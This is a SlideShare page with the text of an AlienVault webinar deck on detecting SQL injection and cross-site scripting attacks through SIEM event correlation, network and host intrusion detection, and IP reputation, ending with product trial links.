Successfully reported this slideshow.
We use your LinkedIn profile and activity data to personalize ads and to show you more relevant ads. You can change your ad preferences anytime.
HOW TO DETECT SQL INJECTION & XSS ATTACKS
USING SIEM EVENT CORRELATION
Tom D’Aquino, Sr. SIEM Engineer
AGENDA
Todays Threat Landscape: Realities & Implications

Web Application Attacks: What are they and what harm can they br...
THREAT LANDSCAPE: OUR NEW REALITY
More and more organizations are finding
themselves in the crosshairs of various bad acto...
THREAT LANDSCAPE: WEB APPLICATION ATTACKS
XSS or Cross Site Scripting and SQL Injection are common methods of attacking we...
THREAT LANDSCAPE: CROSS SITE SCRIPTING ATTACKS
XSS attacks are typically used to compromise a user’s local system and inst...
THREAT LANDSCAPE: CROSS SITE SCRIPTING ATTACKS (CONTINUED)
Once the script is inserted into the web page, it is automatica...
THREAT LANDSCAPE: SQL INJECTION ATTACKS
SQL Injection attacks are commonly used to extract sensitive information from web
...
THREAT LANDSCAPE: SQL INJECTION ATTACKS (CONTINUED)
There are SQL Injection tricks that the hackers can use to find your i...
THE ALIENVAULT USM SOLUTION: NETWORK INTRUSION DETECTION
Network IDS is embedded in our platform, giving you the ability t...
THE ALIENVAULT USM SOLUTION: HOST INTRUSION DETECTION
With Host IDS, you can monitor the
logs of your IIS or Apache web se...
THE ALIENVAULT USM SOLUTION: IP REPUTATION
Tracking activity from attackers around the world allows AlienVault USM to aler...
Security

Asset Discovery

Piece it all
Intelligence
together

Look for strange
Behavioral
activity which could
Monitoring...
UNIFIED SECURITY MANAGEMENT

“Security Intelligence through Integration that we do, NOT you”

USM Platform
•
•
Bundled Pro...
DEMO NETWORK DETAILS
The demo environment that we are testing in today contains
the following:
NON-DEFAULT CONFIGURATION
Apache access.log monitoring is not a default behavior of the
AlienVault HIDS agent
NOW FOR SOME Q&A…
Three Ways to Test Drive AlienVault
Download a Free 30-Day Trial
http://www.alienvault.com/free-trial
Tr...
VIEW ON-DEMAND VIDEO
To view a recorded
version of this webcast
On-Demand
CLICK HERE
Upcoming SlideShare
Loading in …5
×

How to Detect SQL Injections & XSS Attacks Using SIEM Event Correlation

6,885 views

Published on

Two of the oldest and most common attacks used against web applications, SQL injection attacks and cross-site scripting attacks (XSS), continue to impact thousands of websites and millions of users each year. Finding these exposures quickly is essential in order to prevent system compromise and avoid information leakage. SIEM solutions can be invaluable in this effort by collecting and correlating the data you need to identify patterns that signal an attack.

Join AlienVault for this session to learn:

*What data you need to collect to identify the warning signs of an attack
*How to use event correlation to detect cross-site scripting (XSS) and SQL Injection attacks
*How to identify impacted assets so you can quickly limit the damage

You'll come away from the session with a clear picture of how to use SIEM technology to prevent these attacks.

Published in: Technology
  • Be the first to comment

How to Detect SQL Injections & XSS Attacks Using SIEM Event Correlation

  1. 1. HOW TO DETECT SQL INJECTION & XSS ATTACKS USING SIEM EVENT CORRELATION Tom D’Aquino, Sr. SIEM Engineer
  2. 2. AGENDA Todays Threat Landscape: Realities & Implications Web Application Attacks: What are they and what harm can they bring? Threat detection through correlation of NIDS, HIDS and IP Reputation AlienVault Unified Security Management (USM) at a glance Demo environment details Live Demo of USM  Data collection and correlation from a Network IDS to detect web application attacks  Leveraging the OSSEC HIDS agent to monitor web server logs for web application attacks
  3. 3. THREAT LANDSCAPE: OUR NEW REALITY More and more organizations are finding themselves in the crosshairs of various bad actors for a variety of reasons. The number of organizations experiencing high profile breaches is unprecedented ~ SMB increasingly become the target. In 2012 (and we expect this to rise in 2013 and into 2014), 50% of all targeted attacks were aimed at businesses with fewer than 2,500 employees. In fact, the largest growth area for targeted attacks in 2013 was businesses with fewer than 250 employees; 31% of all attacks targeted them.
  4. 4. THREAT LANDSCAPE: WEB APPLICATION ATTACKS XSS or Cross Site Scripting and SQL Injection are common methods of attacking web applications. XSS attacks give attackers the ability to inject malicious code into websites they do not own SQL Injection attacks allow attackers to extract information from a website such as sensitive user information or user credentials
  5. 5. THREAT LANDSCAPE: CROSS SITE SCRIPTING ATTACKS XSS attacks are typically used to compromise a user’s local system and install malware or to impersonate a user on some other website through cookie hijacking. XSS attacks typically require some kind of web form that allows users to post content to the website such as: Comment forms on blog sites Forums, message boards, etc. XSS attacks are easy to carry out using tools like the Browser Explotation Framework (BeEF): http://beefproject.com/
  6. 6. THREAT LANDSCAPE: CROSS SITE SCRIPTING ATTACKS (CONTINUED) Once the script is inserted into the web page, it is automatically executed by the victim’s web browser when the web page is loaded.
  7. 7. THREAT LANDSCAPE: SQL INJECTION ATTACKS SQL Injection attacks are commonly used to extract sensitive information from web applications. Examples include: User account information, i.e. email addresses and passwords Stored credit card data System configuration details
  8. 8. THREAT LANDSCAPE: SQL INJECTION ATTACKS (CONTINUED) There are SQL Injection tricks that the hackers can use to find your interesting data such as viewing all of the tables in the database:
  9. 9. THE ALIENVAULT USM SOLUTION: NETWORK INTRUSION DETECTION Network IDS is embedded in our platform, giving you the ability to detect network level attacks including identifying malicious web requests sent to your web server. Network IDS signatures are updated frequently to keep you on the front lines of advanced detection
  10. 10. THE ALIENVAULT USM SOLUTION: HOST INTRUSION DETECTION With Host IDS, you can monitor the logs of your IIS or Apache web server for indications of XSS and SQL Injection attacks. Web server log monitoring File integrity checking Operating system logging Centralized management
  11. 11. THE ALIENVAULT USM SOLUTION: IP REPUTATION Tracking activity from attackers around the world allows AlienVault USM to alert you when known bad actors are hitting your web site. Automatically correlates known attackers with malicious activity detected from both the network and host intrusion detection systems
  12. 12. Security Asset Discovery Piece it all Intelligence together Look for strange Behavioral activity which could Monitoring indicate a threat • • • • Active Network Scanning Passive Network Scanning Asset Inventory Host-based Software Inventory Vulnerability Assessment Figure out what Asset is valuable Discovery • Network Vulnerability Testing Threat Detection • • • • Network IDS Host IDS Wireless IDS File Integrity Monitoring Behavioral Monitoring Threat Start looking for threats Detection Identify ways the Vulnerability target could be Assessment compromised • Log Collection • Netflow Analysis • Service Availability Monitoring Security Intelligence • SIEM Correlation • Incident Response
  13. 13. UNIFIED SECURITY MANAGEMENT “Security Intelligence through Integration that we do, NOT you” USM Platform • • Bundled Products - 30 Open-Source Security tools to plug the gaps in your existing controls • • USM Framework - Configure, Manage, & Run Security Tools. Visualize output and run reports USM Extension API - Support for inclusion of any other data source into the USM Framework Open Threat Exchange –Provides threat intelligence for collaborative defense
  14. 14. DEMO NETWORK DETAILS The demo environment that we are testing in today contains the following:
  15. 15. NON-DEFAULT CONFIGURATION Apache access.log monitoring is not a default behavior of the AlienVault HIDS agent
  16. 16. NOW FOR SOME Q&A… Three Ways to Test Drive AlienVault Download a Free 30-Day Trial http://www.alienvault.com/free-trial Try our Interactive Demo Site http://www.alienvault.com/live-demo-site Join us for a live Demo http://www.alienvault.com/marketing/alienvault-usmlive-demo Questions? hello@alienvault.com
  17. 17. VIEW ON-DEMAND VIDEO To view a recorded version of this webcast On-Demand CLICK HERE

×